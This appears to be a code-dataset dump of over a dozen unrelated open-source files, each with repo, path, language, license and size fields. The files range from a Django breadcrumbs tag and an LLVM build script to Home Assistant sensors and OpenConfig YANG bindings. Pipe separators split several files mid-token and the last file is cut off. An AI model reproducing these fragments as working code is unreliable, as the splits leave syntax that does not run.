tester.make(["--input='./result/standard'", "--output='./result/out'", "--standard", "--cores=1"
|
])
|
prymitive/bootstrap-breadcrumbs
|
django_bootstrap_breadcrumbs/templatetags/django_bootstrap_breadcrumbs.py
|
Python
|
mit
| 7,292
| 0
|
# -*- coding: utf
|
-8 -*-
"""
:copyrigh
|
t: Copyright 2013 by Łukasz Mierzwa
:contact: l.mierzwa@gmail.com
"""
from __future__ import unicode_literals
import logging
from inspect import ismethod
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.encoding import smart_text
from django.db.models import Model
from django.conf import settings
from django import template, VERSION
from six import wraps
if VERSION >= (3, 0):
from django.utils.translation import gettext as _
else:
from django.utils.translation import ugettext as _
if VERSION >= (2, 0):
from django.urls import (reverse, resolve, NoReverseMatch, Resolver404)
else:
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404)
logger = logging.getLogger(__name__)
register = template.Library()
CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS'
def log_request_not_found():
if VERSION < (1, 8): # pragma: nocover
logger.error("request object not found in context! Check if "
"'django.core.context_processors.request' is in "
"TEMPLATE_CONTEXT_PROCESSORS")
else: # pragma: nocover
logger.error("request object not found in context! Check if "
"'django.template.context_processors.request' is in the "
"'context_processors' option of your template settings.")
def requires_request(func):
@wraps(func)
def wrapped(context, *args, **kwargs):
if 'request' in context:
return func(context, *args, **kwargs)
log_request_not_found()
return ''
return wrapped
@requires_request
def append_breadcrumb(context, label, viewname, args, kwargs):
context['request'].META[CONTEXT_KEY] = context['request'].META.get(
CONTEXT_KEY, []) + [(label, viewname, args, kwargs)]
@register.simple_tag(takes_context=True)
def breadcrumb(context, label, viewname, *args, **kwargs):
"""
Add link to list of breadcrumbs, usage:
{% load bubbles_breadcrumbs %}
{% breadcrumb "Home" "index" %}
Remember to use it inside {% block %} with {{ block.super }} to get all
parent breadcrumbs.
:param label: Breadcrumb link label.
:param viewname: Name of the view to link this breadcrumb to, or Model
instance with implemented get_absolute_url().
:param args: Any arguments to view function.
"""
append_breadcrumb(context, _(escape(label)), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_safe(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not escaped.
"""
append_breadcrumb(context, _(label), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_raw(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not translated.
"""
append_breadcrumb(context, escape(label), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_raw_safe(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not escaped and translated.
"""
append_breadcrumb(context, label, viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
@requires_request
def render_breadcrumbs(context, *args):
"""
Render breadcrumbs html using bootstrap css classes.
"""
try:
template_path = args[0]
except IndexError:
template_path = getattr(settings, 'BREADCRUMBS_TEMPLATE',
'django_bootstrap_breadcrumbs/bootstrap2.html')
links = []
for (label, viewname, view_args, view_kwargs) in context[
'request'].META.get(CONTEXT_KEY, []):
if isinstance(viewname, Model) and hasattr(
viewname, 'get_absolute_url') and ismethod(
viewname.get_absolute_url):
url = viewname.get_absolute_url(*view_args, **view_kwargs)
else:
try:
try:
# 'resolver_match' introduced in Django 1.5
current_app = context['request'].resolver_match.namespace
except AttributeError:
try:
resolver_match = resolve(context['request'].path)
current_app = resolver_match.namespace
except Resolver404:
current_app = None
url = reverse(viewname=viewname, args=view_args,
kwargs=view_kwargs, current_app=current_app)
except NoReverseMatch:
url = viewname
links.append((url, smart_text(label) if label else label))
if not links:
return ''
if VERSION > (1, 8): # pragma: nocover
# RequestContext is deprecated in recent django
# https://docs.djangoproject.com/en/1.10/ref/templates/upgrading/
context = context.flatten()
context['breadcrumbs'] = links
context['breadcrumbs_total'] = len(links)
return mark_safe(template.loader.render_to_string(template_path, context))
class BreadcrumbNode(template.Node):
def __init__(self, nodelist, viewname, args):
self.nodelist = nodelist
self.viewname = viewname
self.args = list(args)
self.kwargs = {}
for arg in args:
if '=' in arg:
name = arg.split('=')[0]
val = '='.join(arg.split('=')[1:])
self.kwargs[name] = val
self.args.remove(arg)
def render(self, context):
if 'request' not in context:
log_request_not_found()
return ''
label = self.nodelist.render(context)
try:
viewname = template.Variable(self.viewname).resolve(context)
except template.VariableDoesNotExist:
viewname = self.viewname
args = self.parse_args(context)
kwargs = self.parse_kwargs(context)
append_breadcrumb(context, label, viewname, args, kwargs)
return ''
def parse_args(self, context):
args = []
for arg in self.args:
try:
value = template.Variable(arg).resolve(context)
except template.VariableDoesNotExist:
value = arg
args.append(value)
return args
def parse_kwargs(self, context):
kwargs = {}
for name, val in self.kwargs.items():
try:
value = template.Variable(val).resolve(context)
except template.VariableDoesNotExist:
value = val
kwargs[name] = value
return kwargs
@register.tag
def breadcrumb_for(parser, token):
bits = list(token.split_contents())
end_tag = 'end' + bits[0]
nodelist = parser.parse((end_tag,))
parser.delete_first_token()
return BreadcrumbNode(nodelist, bits[1], bits[2:])
@register.simple_tag(takes_context=True)
@requires_request
def clear_breadcrumbs(context, *args):
"""
Removes all currently added breadcrumbs.
"""
context['request'].META.pop(CONTEXT_KEY, None)
return ''
|
OpenISA/riscv-sbt
|
scripts/auto/llvm.py
|
Python
|
mit
| 3,402
| 0.004409
|
#!/usr/bin/env python3
from auto.config import DIR, RV32_LINUX
from auto.gnu_toolchain import GnuToolchain
from auto.utils import cat, cd, path, shell
import auto.pkg
import os
class LLVM(auto.pkg.Package):
def _prepare(self):
link = path(DIR.submodules, "llvm/tools/clang")
if not os.path.exists(link):
shell("ln -sf {}/clang {}".format(DIR.submodules, link))
# Apply patches
llvm_dir = path(DIR.submodules, "llvm")
clang_dir = path(DIR.submodules, "clang")
with cd(DIR.patches):
llvm_patches = shell("ls 0?-relax-*", save_out=True).strip().split()
clang_patches = shell("ls 0?-clang-*", save_out=True).strip().split()
if not os.path.exists(path(llvm_dir, ".patched")):
with cd(llvm_dir):
for p in llvm_patches:
shell("patch -p0 < {}/{}".format(DIR.patches, p))
shell("touch .patched")
if not os.path.exists(path(clang_dir, ".patched")):
with cd(clang_dir):
for p in clang_patches:
shell("patch -p0 < {}/{}".format(DIR.patches, p))
shell("touch .patched")
def _build(self):
shell("cmake --build {} -- {}".format(self.build_dir, self.make_opts))
def _install(self):
shell("cmake --build {} --target install".format(self.build_dir))
def _postinstall(self):
srcdir = path(self.build_dir, "lib/Target/RISCV")
dstdir = path(self.prefix, "include/llvm/Target/RISCV")
shell("mkdir -p " + dstdir)
for f in ["RISCVGenInstrInfo.inc", "RISCVGenRegisterInfo.inc"]:
shell("cp {0}/{2} {1}/{2}".format(srcdir, dstdir, f))
def _pkgs():
# lowrisc llvm
name = "llvm"
prefix = DIR.toolchain_debug
build_dir = path(DIR.build, "llvm")
def configure(clang_ver, prefix, gnu_tc_p
|
refix):
return cat(
"cmake",
"-G Ninja",
'-DLLVM_TARGETS_TO_BUIL
|
D="ARM;X86"',
"-DCMAKE_BUILD_TYPE=Debug",
"-DBUILD_SHARED_LIBS=True",
"-DLLVM_USE_SPLIT_DWARF=True",
"-DLLVM_OPTIMIZED_TABLEGEN=True",
"-DLLVM_BUILD_TESTS=True",
"-DCMAKE_C_COMPILER=/usr/bin/clang-{0}",
"-DCMAKE_CXX_COMPILER=/usr/bin/clang++-{0}",
"-DGCC_INSTALL_PREFIX={2}",
"-DLLVM_DEFAULT_TARGET_TRIPLE=" + RV32_LINUX.triple,
'-DLLVM_EXPERIMENTAL_TARGETS_TO_BUILD="RISCV"',
"-DCMAKE_INSTALL_PREFIX={1}",
path(DIR.submodules, "llvm")).format(
clang_ver, prefix, gnu_tc_prefix)
makefile = "build.ninja"
out = "bin/clang"
toolchain = "bin/clang"
deps = ["riscv-gnu-toolchain-newlib"]
pkg0 = LLVM(name, prefix, build_dir,
makefile=makefile,
configure=configure("3.9", prefix, GnuToolchain.PREFIX),
build_out=out,
toolchain=toolchain,
deps=deps)
name = "llvm-gcc7"
prefix = path(DIR.toolchain_debug, "gcc7")
build_dir = path(DIR.build, "llvm-gcc7")
pkg1 = LLVM(name, prefix, build_dir,
makefile=makefile,
configure=configure("6.0", prefix, GnuToolchain.PREFIX_GCC7),
build_out=out,
toolchain=toolchain,
deps=deps)
return [pkg0, pkg1]
auto.pkg.Package.pkgs.extend(_pkgs())
|
rohitranjan1991/home-assistant
|
homeassistant/components/ovo_energy/sensor.py
|
Python
|
mit
| 6,463
| 0.000928
|
"""Support for OVO Energy sensors."""
from __future__ import annotations
from collections.abc import Callable
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Final
from ovoenergy import OVODailyUsage
from ovoenergy.ovoenergy import OVOEnergy
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorEntityDescription,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ENERGY_KILO_WATT_HOUR
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from homeassistant.util import dt as dt_util
from . import OVOEnergyDeviceEntity
from .const import DATA_CLIENT, DATA_COORDINATOR, DOMAIN
SCAN_INTERVAL = timedelta(seconds=300)
PARALLEL_UPDATES = 4
KEY_LAST_ELECTRICITY_COST: Final = "last_electricity_cost"
KEY_LAST_GAS_COST: Final = "last_gas_cost"
@dataclass
class OVOEnergySensorEntityDescription(SensorEntityDescription):
"""Class describing System Bridge sensor entities."""
value: Callable[[OVODailyUsage], StateType | datetime] = round
SENSOR_TYPES_ELECTRICITY: tuple[OVOEnergySensorEntityDescription, ...] = (
OVOEnergySensorEntityDescription(
key="last_electricity_reading",
name="OVO Last Electricity Reading",
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
native_unit_of_measurement=ENERGY_KILO_WATT_HOUR,
value=lambda usage: usage.electricity[-1].consumption,
),
OVOEnergySensorEntityDescription(
key=KEY_LAST_ELECTRICITY_COST,
name="OVO Last Electricity Cost",
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.TOTAL_INCREASING,
value=lambda usage: usage.electricity[-1].cost.amount
if usage.electricity[-1].cost is not None
else None,
),
OVOEnergySensorEntityDescription(
key="last_electricity_start_time",
name="OVO Last Electricity Start Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.start),
),
OVOEnergySensorEntityDescription(
key="last_electricity_end_time",
name="OVO Last Electricity End Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.end),
),
)
SENSOR_TYPES_GAS: tuple[OVOEnergySensorEntityDescription, ...] = (
OVOEnergySensorEntityDescription(
key="last_gas_reading",
name="OVO Last Gas Reading",
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
native_unit_of_measurement=ENERGY_KILO_WATT_HOUR,
icon="mdi:gas-cylinder",
value=lambda usage: usage.gas[-1].consumption,
),
OVOEnergySensorEntityDescription(
key=KEY_LAST_GAS_COST,
name="OVO Last Gas Cost",
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.TOTAL_INCREASING,
icon="mdi:cash-multiple",
value=lambda usage: usage.gas[-1].cost.amount
if usage.gas[-1].cost is not None
else None,
),
OVOEnergySensorEntityDescription(
key="last_gas_start_time",
name="OVO Last Gas Start Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.start),
),
OVOEnergySensorEntityDescription(
key="last_gas_end_time",
name="OVO Last Gas End Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.end),
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up OVO Energy sensor based on a config entry."""
coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][
DATA_COORDINATOR
]
client: OVOEnergy = hass.data[DOMAIN][entry.entry_id][DATA_CLIENT]
entities = []
if coordinator.data:
if coordinator.data.electricity:
for description in SENSOR_TYPES_ELECTRICITY:
if (
description.key == KEY_LAST_ELECTRICITY_COST
and coordinator.data.electricity[-1] is not None
and coordinator.data.electricity[-1].cost is not None
):
description.native_unit_of_measurement = (
coordinator.data.electricity[-1].cost.currency_unit
|
)
entities.append(OVOEnergySensor(coordinator, description, client))
if coordinator.data.gas:
for description in SENSOR_TYPES_GAS:
if (
description.key == KEY_LAST_GAS_COST
and coordinator.data.gas[-1] is
|
not None
and coordinator.data.gas[-1].cost is not None
):
description.native_unit_of_measurement = coordinator.data.gas[
-1
].cost.currency_unit
entities.append(OVOEnergySensor(coordinator, description, client))
async_add_entities(entities, True)
class OVOEnergySensor(OVOEnergyDeviceEntity, SensorEntity):
"""Define a OVO Energy sensor."""
coordinator: DataUpdateCoordinator
entity_description: OVOEnergySensorEntityDescription
def __init__(
self,
coordinator: DataUpdateCoordinator,
description: OVOEnergySensorEntityDescription,
client: OVOEnergy,
) -> None:
"""Initialize."""
super().__init__(
coordinator,
client,
)
self._attr_unique_id = f"{DOMAIN}_{client.account_id}_{description.key}"
self.entity_description = description
@property
def native_value(self) -> StateType | datetime:
"""Return the state."""
usage: OVODailyUsage = self.coordinator.data
return self.entity_description.value(usage)
|
daweiwu/meta-iotqa-1
|
lib/oeqa/runtime/sensor/test_gyro_lsm330dlc.py
|
Python
|
mit
| 2,634
| 0.006834
|
"""
@file test_gyro_lsm330dlc.py
"""
##
# @addtogroup soletta sensor
# @brief This is sensor test based on soletta app
# @brief test sensor lsm330dlc on Galileo/MinnowMax/Edison
##
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestGyroLSM330DLC(oeRuntimeTest):
"""
@class TestGyroLSM330DLC
"""
def setUp(self):
'''Generate fbp file on target
@fn setUp
@param self
@return'''
print 'start!\n'
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py lsm330dlc")
envir = EnvirSetup(self.target)
envir.envirSetup("lsm330dlc","gyro")
def tearDown(self):
'''unload lsm330dlc driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in outp
|
ut:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-1/delete_device")
if "Galileo" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-0/delete_device")
if "BODEGA" in
|
output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-6/delete_device")
def test_Gyro_LSM330DLC(self):
'''Execute the test app and verify sensor data
@fn test_Gyro_LSM330DLC
@param self
@return'''
print 'start reading data!'
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_gyro_lsm330dlc.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_gyro_lsm330dlc.fbp >re.log")
error = output
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/lsm330dlc.log")
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print output + "\n"
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/__init__.py
|
Python
|
apache-2.0
| 19,446
| 0.001337
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collection
|
s import OrderedDict
from decimal import Decimal
f
|
rom bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
from . import types_of_service
class as_external_lsa(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Contents of the AS External LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service")
_yang_name = "as-external-lsa"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__types_of_service = YANGDynClass(
base=types_of_service.types_of_service,
is_container="container",
yang_name="types-of-service",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container)
YANG Description: State parameters for the AS external LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters for the AS external LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_types_of_service(self):
"""
Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container)
YANG Description: Breakdown of External LSA contents specifying multiple
TOS values
"""
return self.__types_of_service
def _set_types_of_service(self, v, load=False):
"""
Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_types_of_service is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_types_of_service() directly.
YANG Description: Breakdown of External LSA contents specifying multiple
TOS values
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=types_of_service.types_of_service,
is_container="container",
yang_name="types-of-service",
parent=self,
path_helper=self._path_helper,
extmethods=self
|
warner83/micropython
|
tests/bytecode/mp-tests/class5.py
|
Python
|
mit
| 96
| 0.03125
|
class A(B):
pass
class A(object):
pass
class A(x.y()):
|
pass
class A(B, C):
|
pass
|
ZeroCater/Eyrie
|
eyrie/wsgi.py
|
Python
|
mit
| 478
| 0
|
"""
WSGI config for eyrie project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more i
|
nformation on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eyrie.settings")
application = get_wsgi_application()
application = Dja
|
ngoWhiteNoise(application)
|
lodevil/pyparser
|
pyparser/symbol.py
|
Python
|
apache-2.0
| 72
| 0
|
class Symb
|
ol(object):
def __init__(self, num, name):
|
pass
|
ade25/ade25.assetmanager
|
ade25/assetmanager/tests/test_setup.py
|
Python
|
mit
| 1,209
| 0.002481
|
# -*- coding: utf-8 -*-
"""Setup/installation tests for this package."""
from ade25.assetmanager.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of ade25.assetmanager into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal
|
']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if ade25.assetmanager is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager'))
def test_uninstall(self):
"""Test if ade25.assetmanager is cleanly uninst
|
alled."""
self.installer.uninstallProducts(['ade25.assetmanager'])
self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that IAde25AssetmanagerLayer is registered."""
from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer
from plone.browserlayer import utils
self.failUnless(IAde25AssetmanagerLayer in utils.registered_layers())
|
kcthrn/clontris
|
clontris/meta.py
|
Python
|
gpl-3.0
| 1,028
| 0
|
# Copyright (C) 2017 Kacy Thorne
#
# This file is part of Clontris.
#
# Clontris is free s
|
oftware: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Clontris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should h
|
ave received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""This module containts project metadata.
If using setuptools, then within setup.py put::
meta = {}
with open(clontris/meta.py) as f:
exec(f.read(), meta)
Then access this module's attributes like this::
version = meta['version']
"""
package_name = 'clontris'
project_name = 'Clontris'
version = '0.1.0-dev'
|
ManrajGrover/CodeSprint_India_2014
|
Qualification_Round_2/Editorials/array_simp_2.py
|
Python
|
mit
| 683
| 0.030747
|
t = int(raw_input())
MOD = 10**9 + 7
def modexp(a,b):
res = 1
while b:
if b&1:
res *= a
res %= MOD
a = (a*a)%MOD
b /= 2
return res
fn = [1 for _ in xrange(100001)]
ifn = [1 for _ in xrange(100001)]
for i in range(1,100000):
fn[i] = fn[i-1] * i
fn[i] %= MOD
ifn[i] = modexp(fn[i],MOD-2)
def nCr(n,k):
return fn[n] * ifn[k] * ifn[n-k
|
]
for ti in range(t):
n = int(raw_input())
a = map(int,raw_input().split())
ans = 0
for i in range(n):
if i%2==0:
ans += nCr(n-1,i)%MOD * a[i]%MOD
else:
ans -= nCr(n-1,i)%MOD * a[i]%MOD
ans %= MOD
print
|
ans
|
zcbenz/cefode-chromium
|
third_party/harfbuzz/contrib/tables/scripts-parse.py
|
Python
|
bsd-3-clause
| 2,516
| 0.010731
|
import sys
from unicode_parse_common import *
# http://www.unicode.org/Public/5.1.0/ucd/Scripts.txt
script_to_harfbuzz = {
# This is the list of HB_Script_* at the time of writing
'Common': 'HB_Script_Common',
'Greek': 'HB_Script_Greek',
'Cyrillic': 'HB_Script_Cyrillic',
'Armenian': 'HB_Script_Armenian',
'Hebrew': 'HB_Script_Hebrew',
'Arabic': 'HB_Script_Arabic',
'Syriac': 'HB_Script_Syriac',
'Thaana': 'HB_Script_Thaa
|
na',
'Devanagari': 'HB_Script_Devanagari',
'Bengali': 'HB_Script_Bengali',
'Gurmukhi': 'HB_Script_Gurmukhi',
'Gujarati': 'HB_Script_Gujarati',
'Oriya': 'HB_Script_Oriya',
|
'Tamil': 'HB_Script_Tamil',
'Telugu': 'HB_Script_Telugu',
'Kannada': 'HB_Script_Kannada',
'Malayalam': 'HB_Script_Malayalam',
'Sinhala': 'HB_Script_Sinhala',
'Thai': 'HB_Script_Thai',
'Lao': 'HB_Script_Lao',
'Tibetan': 'HB_Script_Tibetan',
'Myanmar': 'HB_Script_Myanmar',
'Georgian': 'HB_Script_Georgian',
'Hangul': 'HB_Script_Hangul',
'Ogham': 'HB_Script_Ogham',
'Runic': 'HB_Script_Runic',
'Khmer': 'HB_Script_Khmer',
'Inherited': 'HB_Script_Inherited',
}
class ScriptDict(object):
def __init__(self, base):
self.base = base
def __getitem__(self, key):
r = self.base.get(key, None)
if r is None:
return 'HB_Script_Common'
return r
def main(infile, outfile):
ranges = unicode_file_parse(infile,
ScriptDict(script_to_harfbuzz),
'HB_Script_Common')
ranges = sort_and_merge(ranges)
print >>outfile, '// Generated from Unicode script tables\n'
print >>outfile, '#ifndef SCRIPT_PROPERTIES_H_'
print >>outfile, '#define SCRIPT_PROPERTIES_H_\n'
print >>outfile, '#include <stdint.h>'
print >>outfile, '#include "harfbuzz-shaper.h"\n'
print >>outfile, 'struct script_property {'
print >>outfile, ' uint32_t range_start;'
print >>outfile, ' uint32_t range_end;'
print >>outfile, ' HB_Script script;'
print >>outfile, '};\n'
print >>outfile, 'static const struct script_property script_properties[] = {'
for (start, end, value) in ranges:
print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value)
print >>outfile, '};\n'
print >>outfile, 'static const unsigned script_properties_count = %d;\n' % len(ranges)
print >>outfile, '#endif // SCRIPT_PROPERTIES_H_'
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <input .txt> <output .h>' % sys.argv[0]
else:
main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
|
openstack/neutron-lib
|
neutron_lib/callbacks/resources.py
|
Python
|
apache-2.0
| 1,353
| 0
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language
|
governing permissions and limitations
# under the License.
# String literals representing core resources.
ADDRESS_GROUP = 'address_group'
AGENT = 'agent'
FLOATING_IP = 'floatingip'
LOCAL_IP_ASSOCIATION = 'local_ip_association'
NETWORK = 'network'
NETWORKS = 'networks'
PORT = 'port'
PORTS = 'ports'
PORT_BINDING = 'port_binding'
PORT_DEVICE = 'port_device'
PROCESS = 'process'
RBAC_POLICY = 'rbac-policy'
RO
|
UTER = 'router'
ROUTER_CONTROLLER = 'router_controller'
ROUTER_GATEWAY = 'router_gateway'
ROUTER_INTERFACE = 'router_interface'
SECURITY_GROUP = 'security_group'
SECURITY_GROUP_RULE = 'security_group_rule'
SEGMENT = 'segment'
SEGMENT_HOST_MAPPING = 'segment_host_mapping'
SUBNET = 'subnet'
SUBNETS = 'subnets'
SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope'
SUBPORTS = 'subports'
TRUNK = 'trunk'
TRUNK_PLUGIN = 'trunk_plugin'
|
camilaavilarinho/monitorador-twitter
|
monitortwitter/settings/production.py
|
Python
|
mit
| 3,261
| 0.000613
|
from decouple import Csv, config
from dj_database_url import parse as db_url
from .base import * # noqa
DEBUG = False
SECRET_KEY = config('SECRET_KEY')
DATABASES = {
'default': config('DATABASE_URL', cast=db_url),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
ALLOWED_HOSTS =
|
config('ALLOWED_HOSTS', cast=Csv())
STAT
|
IC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
MEDIA_ROOT = 'mediafiles'
MEDIA_URL = '/media/'
SERVER_EMAIL = 'foo@example.com'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = config('SENDGRID_USERNAME')
